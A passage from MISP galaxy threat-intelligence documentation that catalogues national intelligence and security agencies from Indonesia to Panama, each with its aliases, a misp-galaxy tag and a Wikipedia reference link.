https://en.wikipedia.org/wiki/State_Intelligence_Agency_(Indonesia)

Indonesian Strategic Intelligence Agency

Indonesian Strategic Intelligence Agency (BAIS) – Badan Intelijen Strategis Tentara Nasional Indonesia

The tag is: misp-galaxy:intelligence-agency="Indonesian Strategic Intelligence Agency"

Indonesian Strategic Intelligence Agency is also known as:

  • Badan Intelijen Strategis Tentara Nasional Indonesia

Table 1787. Table References

Links

https://en.wikipedia.org/wiki/Indonesian_Strategic_Intelligence_Agency

Indonesian Army Intelligence Centre

Indonesian Army Intelligence Centre (PUSINTELAD) – Pusat Intelijen Tentara Nasional Indonesia Angkatan Darat

The tag is: misp-galaxy:intelligence-agency="Indonesian Army Intelligence Centre"

Indonesian Army Intelligence Centre is also known as:

  • Pusat Intelijen Tentara Nasional Indonesia Angkatan Darat

Table 1788. Table References

Links

https://en.wikipedia.org/wiki/Indonesian_Army_Intelligence_Centre

National Cyber and Crypto Agency

National Cyber and Crypto Agency (BSSN) – Badan Siber dan Sandi Negara

The tag is: misp-galaxy:intelligence-agency="National Cyber and Crypto Agency"

National Cyber and Crypto Agency is also known as:

  • Badan Siber dan Sandi Negara

Table 1789. Table References

Links

https://en.wikipedia.org/wiki/National_Cyber_and_Crypto_Agency

Attorney General’s Office of Indonesia

Deputy Attorney General on Intelligence (Under the Attorney General’s Office) – Jaksa Agung Muda Bidang Intelijen Kejaksaan Agung

The tag is: misp-galaxy:intelligence-agency="Attorney General’s Office of Indonesia"

Attorney General’s Office of Indonesia is also known as:

  • Jaksa Agung Muda Bidang Intelijen Kejaksaan Agung

Table 1790. Table References

Links

https://en.wikipedia.org/wiki/Attorney_General%27s_Office_of_Indonesia

Directorate General of Immigration (Indonesia)

Directorate of Immigration Intelligence – Direktorat Intelijen Imigrasi

The tag is: misp-galaxy:intelligence-agency="Directorate General of Immigration (Indonesia)"

Directorate General of Immigration (Indonesia) is also known as:

  • Direktorat Intelijen Imigrasi

Table 1791. Table References

Links

https://en.wikipedia.org/wiki/Directorate_General_of_Immigration_(Indonesia)

National Anti-Narcotics Agency (Indonesia)

National Narcotics Agency Intelligence Section – Seksi Intelijen Badan Narkotika Nasional

The tag is: misp-galaxy:intelligence-agency="National Anti-Narcotics Agency (Indonesia)"

National Anti-Narcotics Agency (Indonesia) is also known as:

  • Seksi Intelijen Badan Narkotika Nasional

Table 1792. Table References

Links

https://en.wikipedia.org/wiki/National_Anti-Narcotics_Agency_(Indonesia)

id:Badan Intelijen dan Keamanan Kepolisian Negara Republik Indonesia

Indonesian National Police Intelligence and Security Agency - Badan Intelijen dan Keamanan Kepolisian Negara Republik Indonesia

The tag is: misp-galaxy:intelligence-agency="id:Badan Intelijen dan Keamanan Kepolisian Negara Republik Indonesia"

id:Badan Intelijen dan Keamanan Kepolisian Negara Republik Indonesia is also known as:

  • Badan Intelijen dan Keamanan Kepolisian Negara Republik Indonesia

Table 1793. Table References

Links

https://id.wikipedia.org/wiki/Badan_Intelijen_dan_Keamanan_Kepolisian_Negara_Republik_Indonesia

Directorate General of Customs and Excise (Indonesia)

Customs & Excise Sub-Directorate of Intelligence – Sub-Direktorat Intelijen Direktorat Jenderal Bea Cukai

The tag is: misp-galaxy:intelligence-agency="Directorate General of Customs and Excise (Indonesia)"

Directorate General of Customs and Excise (Indonesia) is also known as:

  • Sub-Direktorat Intelijen Direktorat Jenderal Bea Cukai

Table 1794. Table References

Links

https://en.wikipedia.org/wiki/Directorate_General_of_Customs_and_Excise_(Indonesia)

Indonesian Financial Transaction Reports and Analysis Center

Indonesian Financial Transaction Reports and Analysis Center (PPATK) – Pusat Pelaporan dan Analisis Transaksi Keuangan

The tag is: misp-galaxy:intelligence-agency="Indonesian Financial Transaction Reports and Analysis Center"

Indonesian Financial Transaction Reports and Analysis Center is also known as:

  • Pusat Pelaporan dan Analisis Transaksi Keuangan

Table 1795. Table References

Links

https://en.wikipedia.org/wiki/Indonesian_Financial_Transaction_Reports_and_Analysis_Center

Ministry of Intelligence (Iran)

Ministry of Intelligence (VAJA)

The tag is: misp-galaxy:intelligence-agency="Ministry of Intelligence (Iran)"

Table 1796. Table References

Links

https://en.wikipedia.org/wiki/Ministry_of_Intelligence_(Iran)

Oghab 2

Oghab 2 – Nuclear facilities security

The tag is: misp-galaxy:intelligence-agency="Oghab 2"

Table 1797. Table References

Links

https://en.wikipedia.org/wiki/Oghab_2

Council for Intelligence Coordination

Council for Intelligence Coordination

The tag is: misp-galaxy:intelligence-agency="Council for Intelligence Coordination"

Table 1798. Table References

Links

https://en.wikipedia.org/wiki/Council_for_Intelligence_Coordination

Intelligence Protection Organization of Islamic Republic of Iran Army

Intelligence Protection Organization of Iranian Army (SAHEFAJA)

The tag is: misp-galaxy:intelligence-agency="Intelligence Protection Organization of Islamic Republic of Iran Army"

Table 1799. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Protection_Organization_of_Islamic_Republic_of_Iran_Army

Intelligence Organization of Army of the Guardians of the Islamic Revolution

Intelligence Organization of IRGC

The tag is: misp-galaxy:intelligence-agency="Intelligence Organization of Army of the Guardians of the Islamic Revolution"

Table 1800. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Organization_of_Army_of_the_Guardians_of_the_Islamic_Revolution

Intelligence Protection Organization of Army of the Guardians of the Islamic Revolution

Intelligence Protection Organization of IRGC (SAHEFASA)

The tag is: misp-galaxy:intelligence-agency="Intelligence Protection Organization of Army of the Guardians of the Islamic Revolution"

Table 1801. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Protection_Organization_of_Army_of_the_Guardians_of_the_Islamic_Revolution

Intelligence org of FARAJA

Intelligence org of FARAJA

The tag is: misp-galaxy:intelligence-agency="Intelligence org of FARAJA"

Intelligence org of the Islamic Republic of Iran[12]

Intelligence org of the Islamic Republic of Iran[12]

The tag is: misp-galaxy:intelligence-agency="Intelligence org of the Islamic Republic of Iran[12]"

Table 1802. Table References

Links

https://en.wikipedia.org#cite_note-12

General Security Directorate (Iraq)

General Security Directorate - (GSD) - (Internal security agency)

The tag is: misp-galaxy:intelligence-agency="General Security Directorate (Iraq)"

Table 1803. Table References

Links

https://en.wikipedia.org/wiki/General_Security_Directorate_(Iraq)

Iraqi National Intelligence Service

Iraqi National Intelligence Service - (INIS) - (Foreign intelligence and Special operations)

The tag is: misp-galaxy:intelligence-agency="Iraqi National Intelligence Service"

Table 1804. Table References

Links

https://en.wikipedia.org/wiki/Iraqi_National_Intelligence_Service

Falcons Intelligence Cell

Falcons Intelligence Cell - (FIC) - (Military intelligence)

The tag is: misp-galaxy:intelligence-agency="Falcons Intelligence Cell"

Table 1805. Table References

Links

https://en.wikipedia.org/wiki/Falcons_Intelligence_Cell

Kurdistan Region Security Council

Kurdistan Region Security Council (KRSC) - (Regional security agency)

The tag is: misp-galaxy:intelligence-agency="Kurdistan Region Security Council"

Table 1806. Table References

Links

https://en.wikipedia.org/wiki/Kurdistan_Region_Security_Council

Intelligence and Counter-Terrorism Directorate - Ministry of Interior

Intelligence and Counter-Terrorism Directorate - Ministry of Interior

The tag is: misp-galaxy:intelligence-agency="Intelligence and Counter-Terrorism Directorate - Ministry of Interior"

Directorate of Military Intelligence (Ireland)

Directorate of Military Intelligence (G2)

The tag is: misp-galaxy:intelligence-agency="Directorate of Military Intelligence (Ireland)"

Table 1807. Table References

Links

https://en.wikipedia.org/wiki/Directorate_of_Military_Intelligence_(Ireland)

CIS Corps (Ireland)

Communications and Information Services Corps (CIS) SIGINT Section

The tag is: misp-galaxy:intelligence-agency="CIS Corps (Ireland)"

Table 1808. Table References

Links

https://en.wikipedia.org/wiki/CIS_Corps_(Ireland)

Special Detective Unit

Special Detective Unit (SDU)

The tag is: misp-galaxy:intelligence-agency="Special Detective Unit"

Table 1809. Table References

Links

https://en.wikipedia.org/wiki/Special_Detective_Unit

Garda National Surveillance Unit

National Surveillance Unit (NSU)

The tag is: misp-galaxy:intelligence-agency="Garda National Surveillance Unit"

Table 1810. Table References

Links

https://en.wikipedia.org/wiki/Garda_National_Surveillance_Unit

National Economic Crime Bureau

Financial Intelligence Unit (FIU)

The tag is: misp-galaxy:intelligence-agency="National Economic Crime Bureau"

Table 1811. Table References

Links

https://en.wikipedia.org/wiki/National_Economic_Crime_Bureau

Mossad

Mossad (Foreign Intelligence and Special Operations)

The tag is: misp-galaxy:intelligence-agency="Mossad"

Table 1812. Table References

Links

https://en.wikipedia.org/wiki/Mossad

Shin Bet

Shin Bet (Internal Security Service)

The tag is: misp-galaxy:intelligence-agency="Shin Bet"

Table 1813. Table References

Links

https://en.wikipedia.org/wiki/Shin_Bet

Military Intelligence Directorate (Israel)

Aman (Military intelligence)

The tag is: misp-galaxy:intelligence-agency="Military Intelligence Directorate (Israel)"

Table 1814. Table References

Links

https://en.wikipedia.org/wiki/Military_Intelligence_Directorate_(Israel)

Lahav 433

Lahav 433 (Police intelligence)

The tag is: misp-galaxy:intelligence-agency="Lahav 433"

Table 1815. Table References

Links

https://en.wikipedia.org/wiki/Lahav_433

Agenzia Informazioni e Sicurezza Interna

Agenzia Informazioni e Sicurezza Interna (AISI) - Agency for Internal Information and Security

The tag is: misp-galaxy:intelligence-agency="Agenzia Informazioni e Sicurezza Interna"

Table 1816. Table References

Links

https://en.wikipedia.org/wiki/Agenzia_Informazioni_e_Sicurezza_Interna

Agenzia Informazioni e Sicurezza Esterna

Agenzia Informazioni e Sicurezza Esterna (AISE) - Agency for External Information and Security

The tag is: misp-galaxy:intelligence-agency="Agenzia Informazioni e Sicurezza Esterna"

Table 1817. Table References

Links

https://en.wikipedia.org/wiki/Agenzia_Informazioni_e_Sicurezza_Esterna

Centro Intelligence Interforze

Centro Intelligence Interforze (CII) - Joint Intelligence Center

The tag is: misp-galaxy:intelligence-agency="Centro Intelligence Interforze"

Table 1818. Table References

Links

https://en.wikipedia.org/wiki/Centro_Intelligence_Interforze

Financial Investigations Division (FID)[14]

Financial Investigations Division (FID)[14]

The tag is: misp-galaxy:intelligence-agency="Financial Investigations Division (FID)[14]"

Table 1819. Table References

Links

https://en.wikipedia.org#cite_note-14

Cabinet Intelligence and Research Office

Cabinet Intelligence and Research Office (CIRO)

The tag is: misp-galaxy:intelligence-agency="Cabinet Intelligence and Research Office"

Table 1820. Table References

Links

https://en.wikipedia.org/wiki/Cabinet_Intelligence_and_Research_Office

Defense Intelligence Headquarters

Defense Intelligence Headquarters (DIH)

The tag is: misp-galaxy:intelligence-agency="Defense Intelligence Headquarters"

Table 1821. Table References

Links

https://en.wikipedia.org/wiki/Defense_Intelligence_Headquarters

Public Security Intelligence Agency

Public Security Intelligence Agency (PSIA)

The tag is: misp-galaxy:intelligence-agency="Public Security Intelligence Agency"

Table 1822. Table References

Links

https://en.wikipedia.org/wiki/Public_Security_Intelligence_Agency

Dairat al-Mukhabarat al-Ammah

General Intelligence Department (GID) - (Da’irat al-Mukhabarat al-’Ammah)

The tag is: misp-galaxy:intelligence-agency="Dairat al-Mukhabarat al-Ammah"

Table 1823. Table References

Links

https://en.wikipedia.org/wiki/Dairat_al-Mukhabarat_al-Ammah

National Intelligence Service (Kenya)

National Intelligence Service (NIS)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Service (Kenya)"

Table 1824. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Service_(Kenya)

Criminal Investigation Department (Kenya)

Directorate of Criminal Investigation (DCI)

The tag is: misp-galaxy:intelligence-agency="Criminal Investigation Department (Kenya)"

Table 1825. Table References

Links

https://en.wikipedia.org/wiki/Criminal_Investigation_Department_(Kenya)

Military Intelligence(MI)

Military Intelligence(MI)

The tag is: misp-galaxy:intelligence-agency="Military Intelligence(MI)"

Table 1826. Table References

Links

https://mod.go.ke/reports/cdf-opens-military-intelligence-corps-headquarters/

State Committee for National Security (Kyrgyzstan)

State Committee for National Security (UKMK/GKNB)

The tag is: misp-galaxy:intelligence-agency="State Committee for National Security (Kyrgyzstan)"

Table 1827. Table References

Links

https://en.wikipedia.org/wiki/State_Committee_for_National_Security_(Kyrgyzstan)

General Directorate of General Security

General Directorate of General Security

The tag is: misp-galaxy:intelligence-agency="General Directorate of General Security"

Table 1828. Table References

Links

https://en.wikipedia.org/wiki/General_Directorate_of_General_Security

The Information Branch

The Information Branch

The tag is: misp-galaxy:intelligence-agency="The Information Branch"

Table 1829. Table References

Links

https://en.wikipedia.org/wiki/The_Information_Branch

Lebanese State Security

Lebanese State Security

The tag is: misp-galaxy:intelligence-agency="Lebanese State Security"

Table 1830. Table References

Links

https://en.wikipedia.org/wiki/Lebanese_State_Security

National Security Agency (Liberia)

National Security Agency

The tag is: misp-galaxy:intelligence-agency="National Security Agency (Liberia)"

Table 1831. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Agency_(Liberia)

State Security Department of Lithuania

State Security Department - (Valstybes saugumo departamentas (VSD))

The tag is: misp-galaxy:intelligence-agency="State Security Department of Lithuania"

Table 1832. Table References

Links

https://en.wikipedia.org/wiki/State_Security_Department_of_Lithuania

Second Investigation Department

Second Investigation Department - (Antrasis operatyvinių tarnybų departamentas (AOTD))

The tag is: misp-galaxy:intelligence-agency="Second Investigation Department"

Table 1833. Table References

Links

https://en.wikipedia.org/wiki/Second_Investigation_Department

Service de Renseignement de l’État

Luxembourg State Intelligence Service - (Service de Renseignement de l’État Luxembourgeois)

The tag is: misp-galaxy:intelligence-agency="Service de Renseignement de l’État"

Table 1834. Table References

Links

https://en.wikipedia.org/wiki/Service_de_Renseignement_de_l%E2%80%99%C3%89tat

Central Intelligence Service (CIS)[15]

Central Intelligence Service (CIS)[15]

The tag is: misp-galaxy:intelligence-agency="Central Intelligence Service (CIS)[15]"

Table 1835. Table References

Links

https://en.wikipedia.org#cite_note-15

Malaysian Defence Intelligence Organisation

Malaysian Defence Intelligence Organisation (Military Intelligence)

The tag is: misp-galaxy:intelligence-agency="Malaysian Defence Intelligence Organisation"

Table 1836. Table References

Links

https://en.wikipedia.org/wiki/Malaysian_Defence_Intelligence_Organisation

Research Division of the Prime Minister’s Department

Malaysian External Intelligence Organisation (Foreign Intelligence)

The tag is: misp-galaxy:intelligence-agency="Research Division of the Prime Minister’s Department"

Table 1837. Table References

Links

https://en.wikipedia.org/wiki/Research_Division_of_the_Prime_Minister%27s_Department

Malaysian Special Branch

Malaysian Special Branch (Police & Internal Intelligence)

The tag is: misp-galaxy:intelligence-agency="Malaysian Special Branch"

Table 1838. Table References

Links

https://en.wikipedia.org/wiki/Malaysian_Special_Branch

Crime-Combat Planning, Analysis and Information Center (CENAPI / PGR – Centro de Planeación, Análisis e Información para el Combate a la Delincuencia)

Crime-Combat Planning, Analysis and Information Center (CENAPI / PGR – Centro de Planeación, Análisis e Información para el Combate a la Delincuencia)

The tag is: misp-galaxy:intelligence-agency="Crime-Combat Planning, Analysis and Information Center (CENAPI / PGR – Centro de Planeación, Análisis e Información para el Combate a la Delincuencia)"

Assistant Attorney General’s Office for Special Investigations on Organized Crime

Assistant Attorney General’s Office for Special Investigations on Organized Crime (SEIDO / PGR)

The tag is: misp-galaxy:intelligence-agency="Assistant Attorney General’s Office for Special Investigations on Organized Crime"

Table 1839. Table References

Links

https://en.wikipedia.org/wiki/Assistant_Attorney_General%27s_Office_for_Special_Investigations_on_Organized_Crime

Federal Police (Mexico)

Intelligence Division of the Federal Police (Division de Inteligencia – CNS / Policia Federal)

The tag is: misp-galaxy:intelligence-agency="Federal Police (Mexico)"

Table 1840. Table References

Links

https://en.wikipedia.org/wiki/Federal_Police_(Mexico)#Intelligence_Division

National Intelligence Centre (México)

National Intelligence Centre (CNI)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Centre (México)"

Table 1841. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Centre_(M%C3%A9xico)

Estado Mayor Presidencial

2nd Section of the National Defense Intelligence Staff (SEDENA S-2 – Seccion 2da: Inteligencia del Estado Mayor)

The tag is: misp-galaxy:intelligence-agency="Estado Mayor Presidencial"

Table 1842. Table References

Links

https://en.wikipedia.org/wiki/Estado_Mayor_Presidencial

SEDENA

Military Intelligence – National Defense Ministry (Inteligencia Militar – SEDENA / Ejercito y Fuerza Aerea)

The tag is: misp-galaxy:intelligence-agency="SEDENA"

Table 1843. Table References

Links

https://en.wikipedia.org/wiki/SEDENA

Secretariat of the Navy

Naval Intelligence - (Inteligencia Naval / SEMAR / Marina Armada)

The tag is: misp-galaxy:intelligence-agency="Secretariat of the Navy"

Table 1844. Table References

Links

https://en.wikipedia.org/wiki/Secretariat_of_the_Navy

Information and Security Service of the Republic of Moldova

Information and Security Service (SIS)

The tag is: misp-galaxy:intelligence-agency="Information and Security Service of the Republic of Moldova"

Table 1845. Table References

Links

https://en.wikipedia.org/wiki/Information_and_Security_Service_of_the_Republic_of_Moldova

General Intelligence Agency of Mongolia

General Intelligence Agency of Mongolia (GIA)

The tag is: misp-galaxy:intelligence-agency="General Intelligence Agency of Mongolia"

Table 1846. Table References

Links

https://en.wikipedia.org/wiki/General_Intelligence_Agency_of_Mongolia

National Security Agency (Montenegro)

National Security Agency (ANB)

The tag is: misp-galaxy:intelligence-agency="National Security Agency (Montenegro)"

Table 1847. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Agency_(Montenegro)

General Directorate for Territorial Surveillance (Morocco)

General Directorate for Territorial Surveillance - Direction de la Surveillance du Territoire (DST)

The tag is: misp-galaxy:intelligence-agency="General Directorate for Territorial Surveillance (Morocco)"

Table 1848. Table References

Links

https://en.wikipedia.org/wiki/General_Directorate_for_Territorial_Surveillance_(Morocco)

Deuxième Bureau (Morocco)

Deuxième Bureau (Morocco) - Military secret service

The tag is: misp-galaxy:intelligence-agency="Deuxième Bureau (Morocco)"

Table 1849. Table References

Links

https://en.wikipedia.org/wiki/Deuxi%C3%A8me_Bureau_(Morocco)

Direction Generale pour l’Etude et la Documentation

Directorate of Research and Documentation - Direction Generale pour l’Etude et la Documentation (DGED)

The tag is: misp-galaxy:intelligence-agency="Direction Generale pour l’Etude et la Documentation"

Table 1850. Table References

Links

https://en.wikipedia.org/wiki/Direction_Generale_pour_l%27Etude_et_la_Documentation

Office of the Chief of Military Security Affairs

Office of the Chief of Military Security Affairs (OCMSA)

The tag is: misp-galaxy:intelligence-agency="Office of the Chief of Military Security Affairs"

Table 1851. Table References

Links

https://en.wikipedia.org/wiki/Office_of_the_Chief_of_Military_Security_Affairs

Bureau Of Special Investigation

Bureau Of Special Investigation (BSI)

The tag is: misp-galaxy:intelligence-agency="Bureau Of Special Investigation"

Table 1852. Table References

Links

https://en.wikipedia.org/wiki/Bureau_Of_Special_Investigation

Special Intelligence Department

Special Intelligence Department (SID)

The tag is: misp-galaxy:intelligence-agency="Special Intelligence Department"

Table 1853. Table References

Links

https://en.wikipedia.org/wiki/Special_Intelligence_Department

Namibia Central Intelligence Service

Namibia Central Intelligence Service (NCIS)

The tag is: misp-galaxy:intelligence-agency="Namibia Central Intelligence Service"

Table 1854. Table References

Links

https://en.wikipedia.org/wiki/Namibia_Central_Intelligence_Service

Directorate of Military Intelligence, Nepal

Directorate of Military Intelligence (DMI)

The tag is: misp-galaxy:intelligence-agency="Directorate of Military Intelligence, Nepal"

Table 1855. Table References

Links

https://en.wikipedia.org/wiki/Directorate_of_Military_Intelligence,_Nepal

National Investigation Department of Nepal

National Investigation Department (NID)

The tag is: misp-galaxy:intelligence-agency="National Investigation Department of Nepal"

Table 1856. Table References

Links

https://en.wikipedia.org/wiki/National_Investigation_Department_of_Nepal

General Intelligence and Security Service

General Intelligence and Security Service - Algemene Inlichtingen en Veiligheidsdienst (AIVD)

The tag is: misp-galaxy:intelligence-agency="General Intelligence and Security Service"

Table 1857. Table References

Links

https://en.wikipedia.org/wiki/General_Intelligence_and_Security_Service

Joint Sigint Cyber Unit

Joint Sigint Cyber Unit (JSCU)

The tag is: misp-galaxy:intelligence-agency="Joint Sigint Cyber Unit"

Table 1858. Table References

Links

https://en.wikipedia.org/wiki/Joint_Sigint_Cyber_Unit

National Coordinator for Counterterrorism and Security

National Coordinator for Counterterrorism and Security - Nationaal Coördinator Terrorismebestrijding en Veiligheid (NCTV)

The tag is: misp-galaxy:intelligence-agency="National Coordinator for Counterterrorism and Security"

National Coordinator for Counterterrorism and Security is also known as:

  • Nationaal Coördinator Terrorismebestrijding en Veiligheid

Table 1859. Table References

Links

https://en.wikipedia.org/wiki/National_Coordinator_for_Counterterrorism_and_Security

Team Criminal Intelligence (KMar-TCI)

Team Criminal Intelligence (KMar-TCI)

The tag is: misp-galaxy:intelligence-agency="Team Criminal Intelligence (KMar-TCI)"

Team Criminal Intelligence (FIOD-TCI)

Team Criminal Intelligence (FIOD-TCI)

The tag is: misp-galaxy:intelligence-agency="Team Criminal Intelligence (FIOD-TCI)"

Government Communications Security Bureau

Government Communications Security Bureau

The tag is: misp-galaxy:intelligence-agency="Government Communications Security Bureau"

Table 1860. Table References

Links

https://en.wikipedia.org/wiki/Government_Communications_Security_Bureau

New Zealand Security Intelligence Service

New Zealand Security Intelligence Service

The tag is: misp-galaxy:intelligence-agency="New Zealand Security Intelligence Service"

Table 1861. Table References

Links

https://en.wikipedia.org/wiki/New_Zealand_Security_Intelligence_Service

National Assessments Bureau

National Assessments Bureau

The tag is: misp-galaxy:intelligence-agency="National Assessments Bureau"

Table 1862. Table References

Links

https://en.wikipedia.org/wiki/National_Assessments_Bureau

National Intelligence Agency (Nigeria)

National Intelligence Agency (Foreign Intelligence and Counterintelligence)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Agency (Nigeria)"

Table 1863. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Agency_(Nigeria)

Defence Intelligence Agency (Nigeria)

Defence Intelligence Agency (Military Intelligence)

The tag is: misp-galaxy:intelligence-agency="Defence Intelligence Agency (Nigeria)"

Table 1864. Table References

Links

https://en.wikipedia.org/wiki/Defence_Intelligence_Agency_(Nigeria)

State Security Service (Nigeria)

State Security Service (Internal Security)

The tag is: misp-galaxy:intelligence-agency="State Security Service (Nigeria)"

Table 1865. Table References

Links

https://en.wikipedia.org/wiki/State_Security_Service_(Nigeria)

Reconnaissance General Bureau

Reconnaissance General Bureau

The tag is: misp-galaxy:intelligence-agency="Reconnaissance General Bureau"

Table 1866. Table References

Links

https://en.wikipedia.org/wiki/Reconnaissance_General_Bureau

Ministry of State Security (North Korea)

Ministry of State Security

The tag is: misp-galaxy:intelligence-agency="Ministry of State Security (North Korea)"

Table 1867. Table References

Links

https://en.wikipedia.org/wiki/Ministry_of_State_Security_(North_Korea)

Administration for Security and Counterintelligence

Administration for Security and Counterintelligence (Uprava za bezbednost i kontrarazuznavanje) (Police Agency)

The tag is: misp-galaxy:intelligence-agency="Administration for Security and Counterintelligence"

Administration for Security and Counterintelligence is also known as:

  • Uprava za bezbednost i kontrarazuznavanje

Table 1868. Table References

Links

https://en.wikipedia.org/wiki/Administration_for_Security_and_Counterintelligence

Intelligence Agency of North Macedonia

Intelligence Agency (Agencija za Razuznavanje) (Civilian Agency) IA

The tag is: misp-galaxy:intelligence-agency="Intelligence Agency of North Macedonia"

Intelligence Agency of North Macedonia is also known as:

  • Agencija za Razuznavanje

Table 1869. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Agency_of_North_Macedonia

Military Service for Security and Intelligence

Military Service for Security and Intelligence (Voena služba za razuznuvanje i bezbednost) (Military Agency)

The tag is: misp-galaxy:intelligence-agency="Military Service for Security and Intelligence"

Military Service for Security and Intelligence is also known as:

  • Voena služba za razuznuvanje i bezbednost

Table 1870. Table References

Links

https://en.wikipedia.org/wiki/Military_Service_for_Security_and_Intelligence

Nasjonal sikkerhetsmyndighet

Nasjonal sikkerhetsmyndighet (NSM) (National Security Authority)

The tag is: misp-galaxy:intelligence-agency="Nasjonal sikkerhetsmyndighet"

Table 1871. Table References

Links

https://en.wikipedia.org/wiki/Nasjonal_sikkerhetsmyndighet

Politiets sikkerhetstjeneste

Politiets sikkerhetstjeneste (PST) (Police Security Service)

The tag is: misp-galaxy:intelligence-agency="Politiets sikkerhetstjeneste"

Table 1872. Table References

Links

https://en.wikipedia.org/wiki/Politiets_sikkerhetstjeneste

Etterretningstjenesten

Etterretningstjenesten (NIS) (Norwegian Intelligence Service)

The tag is: misp-galaxy:intelligence-agency="Etterretningstjenesten"

Table 1873. Table References

Links

https://en.wikipedia.org/wiki/Etterretningstjenesten

Forsvarets sikkerhetstjeneste

Forsvarets sikkerhetstjeneste (FOST) – Norwegian Defence Security Service (NORDSS)

The tag is: misp-galaxy:intelligence-agency="Forsvarets sikkerhetstjeneste"

Table 1874. Table References

Links

https://en.wikipedia.org/wiki/Forsvarets_sikkerhetstjeneste

Palace Office (Oman)

The Palace Office [Foreign Intelligence]

The tag is: misp-galaxy:intelligence-agency="Palace Office (Oman)"

Table 1875. Table References

Links

https://en.wikipedia.org/wiki/Palace_Office_(Oman)

Internal Security Service

Internal Security Service [Internal Security]

The tag is: misp-galaxy:intelligence-agency="Internal Security Service"

Table 1876. Table References

Links

https://en.wikipedia.org/wiki/Internal_Security_Service

Inter-Services Intelligence

Inter-Services Intelligence (ISI)

The tag is: misp-galaxy:intelligence-agency="Inter-Services Intelligence"

Table 1877. Table References

Links

https://en.wikipedia.org/wiki/Inter-Services_Intelligence

Air Intelligence (Pakistan)

Air Intelligence (AI)

The tag is: misp-galaxy:intelligence-agency="Air Intelligence (Pakistan)"

Table 1878. Table References

Links

https://en.wikipedia.org/wiki/Air_Intelligence_(Pakistan)

Military Intelligence (Pakistan)

Military Intelligence (MI)

The tag is: misp-galaxy:intelligence-agency="Military Intelligence (Pakistan)"

Table 1879. Table References

Links

https://en.wikipedia.org/wiki/Military_Intelligence_(Pakistan)

Naval Intelligence (Pakistan)

Naval Intelligence (NI)

The tag is: misp-galaxy:intelligence-agency="Naval Intelligence (Pakistan)"

Table 1880. Table References

Links

https://en.wikipedia.org/wiki/Naval_Intelligence_(Pakistan)

Intelligence Bureau (Pakistan)

Intelligence Bureau (IB)

The tag is: misp-galaxy:intelligence-agency="Intelligence Bureau (Pakistan)"

Table 1881. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Bureau_(Pakistan)

Federal Investigation Agency

Federal Investigation Agency (FIA)

The tag is: misp-galaxy:intelligence-agency="Federal Investigation Agency"

Table 1882. Table References

Links

https://en.wikipedia.org/wiki/Federal_Investigation_Agency

National Counter Terrorism Authority

National Counter Terrorism Authority (NACTA)

The tag is: misp-galaxy:intelligence-agency="National Counter Terrorism Authority"

Table 1883. Table References

Links

https://en.wikipedia.org/wiki/National_Counter_Terrorism_Authority

Counter Terrorism Department (Pakistan)

Counter Terrorism Department (CTD)

The tag is: misp-galaxy:intelligence-agency="Counter Terrorism Department (Pakistan)"

Table 1884. Table References

Links

https://en.wikipedia.org/wiki/Counter_Terrorism_Department_(Pakistan)

National Intelligence Directorate (Pakistan)

National Intelligence Directorate (NID)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Directorate (Pakistan)"

Table 1885. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Directorate_(Pakistan)

Special Branch (Pakistan)

Special Branch (Pakistan)

The tag is: misp-galaxy:intelligence-agency="Special Branch (Pakistan)"

Table 1886. Table References

Links

https://en.wikipedia.org/wiki/Special_Branch_(Pakistan)

Directorate General of Intelligence and Investigation

Directorate-General of Intelligence and Investigation (DGII)

The tag is: misp-galaxy:intelligence-agency="Directorate General of Intelligence and Investigation"

Table 1887. Table References

Links

https://en.wikipedia.org/wiki/Directorate_General_of_Intelligence_and_Investigation

Financial Monitoring Unit

Financial Monitoring Unit (FMU)

The tag is: misp-galaxy:intelligence-agency="Financial Monitoring Unit"

Table 1888. Table References

Links

https://en.wikipedia.org/wiki/Financial_Monitoring_Unit

National Accountability Bureau

National Accountability Bureau (NAB)

The tag is: misp-galaxy:intelligence-agency="National Accountability Bureau"

Table 1889. Table References

Links

https://en.wikipedia.org/wiki/National_Accountability_Bureau

Security and Exchange Commission of Pakistan

Security and Exchange Commission Pakistan (SECP)

The tag is: misp-galaxy:intelligence-agency="Security and Exchange Commission of Pakistan"

Table 1890. Table References

Links

https://en.wikipedia.org/wiki/Security_and_Exchange_Commission_of_Pakistan

Anti-Narcotics Force

Anti-Narcotics Force (ANF)

The tag is: misp-galaxy:intelligence-agency="Anti-Narcotics Force"

Table 1891. Table References

Links

https://en.wikipedia.org/wiki/Anti-Narcotics_Force

National Crises Management Cell

National Crises Management Cell (NCMC)

The tag is: misp-galaxy:intelligence-agency="National Crises Management Cell"

Table 1892. Table References

Links

https://en.wikipedia.org/wiki/National_Crises_Management_Cell

Palestinian Preventive Security

Palestinian Preventive Security (internal security)

The tag is: misp-galaxy:intelligence-agency="Palestinian Preventive Security"

Table 1893. Table References

Links

https://en.wikipedia.org/wiki/Palestinian_Preventive_Security

Palestinian National Security Forces

Palestinian National Security Forces

The tag is: misp-galaxy:intelligence-agency="Palestinian National Security Forces"

Table 1894. Table References

Links

https://en.wikipedia.org/wiki/Palestinian_National_Security_Forces

National Police Intelligence Directorate

National Police Intelligence Directorate (DNIP) – Dirección Nacional de Inteligencia Policial

The tag is: misp-galaxy:intelligence-agency="National Police Intelligence Directorate"

Table 1895. Table References

Links

https://en.wikipedia.org/wiki/National_Police_Intelligence_Directorate

General Directorate of Analysis and Strategic Intelligence (Panama) (page does not exist)

General Directorate of Analysis and Strategic Intelligence - Direccion General de Analisis e Inteligencia Estrategica (DGAIE)

The tag is: misp-galaxy:intelligence-agency="General Directorate of Analysis and Strategic Intelligence (Panama) (page does not exist)"

Table 1896. Table References

Links

https://en.wikipedia.org/w/index.php?title=General_Directorate_of_Analysis_and_Strategic_Intelligence_(Panama)&action=edit&redlink=1

National Intelligence and Security Service (Panama) (page does not exist)

